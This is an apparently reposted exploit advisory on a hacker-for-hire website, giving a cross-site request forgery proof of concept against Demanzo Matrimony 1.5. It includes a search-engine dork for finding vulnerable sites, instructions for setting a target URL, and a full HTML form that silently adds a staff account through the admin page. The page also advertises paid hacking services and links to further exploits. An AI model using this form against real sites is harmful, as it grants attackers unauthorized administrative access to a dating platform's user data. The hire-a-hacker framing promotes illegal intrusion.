Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us: Help@mobilehackerforhire.com

Telegram Medium
Mobile Hacker For Hire, hire a hacker, hiring a hacker, hacker with proof
Hire a hacker

Demanzo Matrimony 1.5 Cross Site Request Forgery ≈ Mobile Hacker For Hire

#1 Mobile Hacker For Hire > Blog > Uncategorized > Demanzo Matrimony 1.5 Cross Site Request Forgery ≈ Mobile Hacker For Hire

Table of Contents

====================================================================================================================================
| # Title : Demanzo Matrimony v.1.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0.1(32-bit) |
| # Vendor : https://demanzo.com/matrimony-site-development/ |
| # Dork : Powered by ITAcumens or “Powered by Demanzo” |
====================================================================================================================================

poc :

[+] infected file: add-staff.php

[+] Inside folder /admin/add-staff.php

[+] Dorking İn Google Or Other Search Enggine.

[+] Copy the code below and paste it into an HTML file.

[+] Go to the line 2.

[+] Set the target site link Save changes and apply .

</div>
<form action=”https://www.example/web/html/admin/add-staff.php” method=”POST”>
<div id=”msg”>
<div class=”form-group ban_btm1 col-md-6 no_pad”>
<label class=”control-label col-md-4 frm_pd”>Name <span class=”red”>*</span> : </label>
<div class=”col-md-8 frm_pd”>
<input required=”” name=”name” id=”name” value=”” type=”text” class=”form-control” placeholder=”Enter Name”>
</div>
</div>

<div class=”form-group ban_btm1 col-md-6 no_pad”>
<label class=”control-label col-md-4 frm_pd”>Password <span class=”red”>*</span> : </label>
<div class=”col-md-8 frm_pd”>
<input required=”” name=”pass” id=”pass” value=”” type=”password” class=”form-control” placeholder=”Enter Password”>
</div>
</div>

<div class=”form-group ban_btm1 col-md-6 no_pad”>
<label class=”control-label col-md-4 frm_pd”>Email ID <span class=”red”>*</span> : </label>
<div class=”col-md-8 frm_pd”>
<input required=”” name=”email” id=”email” value=”” type=”email” class=”form-control” placeholder=”Enter Email ID”>
</div>
</div>

<div class=”form-group ban_btm1 col-md-6 no_pad”>
<label class=”control-label col-md-4 frm_pd”>Gender <span class=”red”>*</span> : </label>
<div class=”col-md-8 frm_pd”>
<input type=”radio” name=”gender” value=”Male” checked=””><label class=”rd_btn”>Male</label>
<input type=”radio” name=”gender” value=”Female”><label class=”rd_btn”>Female</label>
</div>
</div>

<div class=”form-group ban_btm1 col-md-12 no_pad”>
<label class=”control-label frm_pd col-md-2″>Designation <span class=”red”>*</span> : </label>
<div class=”col-md-10 frm_pd”>
<input required=”” name=”designation” value=”” id=”designation” type=”text” class=”form-control” placeholder=”Enter Designation”>
</div>
</div>

<div class=”form-group ban_btm1 col-md-12 no_pad”>
<label class=”control-label col-md-2 frm_pd”>Address <span class=”red”>*</span> : </label>
<div class=”col-md-10 frm_pd”>
<textarea required=”” name=”address” id=”address” rows=”7″ class=”form-control” placeholder=”Enter Address”></textarea>
</div>
</div>

<!– <div class=”form-group ban_btm1 col-md-12 no_pad”> –>
<!– <label class=”control-label col-md-2 frm_pd”>Access Level <span class=”red”>*</span> : </label> –>
<!– <div class=”col-md-10 frm_pd chk_box”> –>
<!– <input id=”access1″ type=”checkbox” checked /> <label for=”access1″ class=”col-lg-3 col-md-5 col-sm-6″>All</label> –>
<!– <input id=”access2″ type=”checkbox” /> <label for=”access2″ class=”col-lg-4 col-md-7 col-sm-6″>Manage Plan</label> –>
<!– <input id=”access3″ type=”checkbox” /> <label for=”access3″ class=”col-lg-5 col-md-5 col-sm-6″>Manage Kootam / Kulam</label> –>
<!– <input id=”access4″ type=”checkbox” /> <label for=”access4″ class=”col-lg-3 col-md-7 col-sm-6″>To Approve</label> –>
<!– <input id=”access5″ type=”checkbox” /> <label for=”access5″ class=”col-lg-4 col-md-5 col-sm-6″>Manage Success Stories</label> –>
<!– <input id=”access6″ type=”checkbox” /> <label for=”access6″ class=”col-lg-5 col-md-7 col-sm-6″>Manage Advertisement</label> –>
<!– <input id=”access7″ type=”checkbox” /> <label for=”access7″ class=”col-lg-3 col-md-5 col-sm-6″>Manage Staff</label> –>
<!– <input id=”access8″ type=”checkbox” /> <label for=”access8″ class=”col-lg-4 col-md-7 col-sm-6″>Manage Member</label> –>
<!– <input id=”access9″ type=”checkbox” /> <label for=”access9″ class=”col-lg-5 col-md-5 col-sm-6″>Manage City</label> –>
<!– <input id=”access10″ type=”checkbox” /> <label for=”access10″ class=”col-lg-3 col-md-7 col-sm-6″>Manage State</label> –>
<!– <input id=”access11″ type=”checkbox” /> <label for=”access11″ class=”col-lg-4 col-md-5 col-sm-6″>Manage Country</label> –>
<!– <input id=”access12″ type=”checkbox” /> <label for=”access12″ class=”col-lg-5 col-md-7 col-sm-6″>Manage Education</label> –>
<!– <input id=”access13″ type=”checkbox” /> <label for=”access13″ class=”col-lg-3 col-md-5 col-sm-6″>Reports</label> –>
<!– <input id=”access14″ type=”checkbox” /> <label for=”access14″ class=”col-lg-4 col-md-7 col-sm-6″>Ematch</label> –>
<!– <input id=”access15″ type=”checkbox” /> <label for=”access15″ class=”col-lg-5 col-md-5 col-sm-6″>Advanced Search</label> –>
<!– <input id=”access16″ type=”checkbox” /> <label for=”access16″ class=”col-lg-3 col-md-7 col-sm-6″>Group Mail</label> –>
<!– <input id=”access17″ type=”checkbox” /> <label for=”access17″ class=”col-lg-4 col-md-5 col-sm-6″>Featured Profiles</label> –>
<!– <input id=”access18″ type=”checkbox” /> <label for=”access18″ class=”col-lg-5 col-md-7 col-sm-6″>Upgrade / Renewal Membership</label> –>
<!– <input id=”access19″ type=”checkbox” /> <label for=”access19″ class=”col-lg-3 col-md-5 col-sm-6″>Accounts </label> –>
<!– <input id=”access20″ type=”checkbox” /> <label for=”access20″ class=”col-lg-4 col-md-7 col-sm-6″>Logo</label> –>
<!– <input id=”access21″ type=”checkbox” /> <label for=”access21″ class=”col-lg-5 col-md-5 col-sm-6″>Religion</label> –>
<!– </div> –>
<!– </div> –>

<!– <div class=”form-group ban_btm1 col-lg-7 col-md-12 no_pad”> –>
<!– <label class=”control-label col-lg-4 col-md-2 frm_pd no_pad”>IP Address Controls <span class=”red”>*</span> : </label> –>
<!– <div class=”col-lg-8 col-md-10 frm_pd chk_box”> –>
<!– <input id=”status1″ type=”checkbox” checked /> <label for=”status1″ class=”col-md-4″>All</label> –>
<!– <input id=”status2″ type=”checkbox” /> <label for=”status2″ class=”col-md-8″>192.168.10.156</label> –>
<!– </div> –>
<!– </div> –>

<div class=”form-group ban_btm1 col-lg-5 col-md-12 no_pad”>
<label class=”control-label col-lg-4 col-md-2 frm_pd no_pad”>Staff Status <span class=”red”>*</span> : </label>
<div class=”col-lg-8 col-md-10 frm_pd”>
<input type=”radio” name=”status” value=”0″ checked=””><label class=”rd_btn”>Active</label>
<input type=”radio” name=”status” value=”1″><label class=”rd_btn”>Inactive</label>
</div>
</div>

<div class=”col-md-2 col-md-offset-5 col-sm-12″>
<input type=”submit” class=”ctn_btn no_mt1″ value=”Add” name=”add”>
</div>

Greetings to :===================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet|
==================================================================================================

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Post

Uncategorized
Catpops Technobiz CMS 4.0 Cross Site Scripting
Posted on
Uncategorized
ABUS Security Camera LFI, RCE and SSH Root
Posted on
Uncategorized
Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666
Posted on

©2022. Mobile Hacker For Hire. All Rights Reserved.

help@mobilehackerforhire.com

error: Content is protected !!